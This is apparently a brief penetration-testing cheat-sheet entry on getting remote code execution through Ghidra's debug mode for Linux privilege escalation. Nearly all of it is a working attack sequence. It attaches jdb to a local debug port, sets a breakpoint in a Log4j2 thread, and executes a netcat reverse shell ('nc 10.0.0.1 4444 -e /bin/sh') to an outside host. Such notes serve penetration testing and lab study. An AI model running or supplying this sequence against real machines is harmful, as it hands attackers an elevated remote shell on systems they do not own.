Ghidra Debug Mode RCE

Last modified: Fri Mar 31 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Linux Privilege Escalation

Exploitation

jdb -attach 127.0.0.1:18001
> classpath
> classes
Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh")